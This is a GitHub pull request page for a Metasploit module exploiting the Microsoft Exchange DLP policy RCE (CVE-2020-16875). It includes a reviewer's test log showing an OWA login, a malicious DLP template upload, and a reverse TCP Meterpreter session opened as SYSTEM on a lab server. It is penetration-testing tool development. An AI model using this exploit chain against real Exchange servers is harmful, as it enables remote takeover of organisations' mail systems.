-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875) #14126
Conversation
1fe6153
to
1d23bd1
Compare
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
f48ef06
to
9d0a9c8
Compare
9d0a9c8
to
0b949aa
Compare
0b949aa
to
e118ff1
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Tested successfully from a combined branch of 14126 + 14139
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
[*] Started reverse TCP handler on 192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.159.53/owa/
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abn Amro Hoare Govett Limited Data
[*] Powershell command length: 2092
[*] Sending stage (200262 bytes) to 192.168.159.53
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.53:6911) at 2020-09-16 12:32:55 -0400
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-GD5KVDKUNIP
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : EXCHG
Logged On Users : 11
Meterpreter : x64/windows
meterpreter >
e0e0ac2
to
03e0b90
Compare
Retested this just now with the latest changes that addressed my comments and everything is still working so I'm going to go ahead and get this landed momentarily. |
Release NotesNew module |
Requires #14139!
Info
Exploit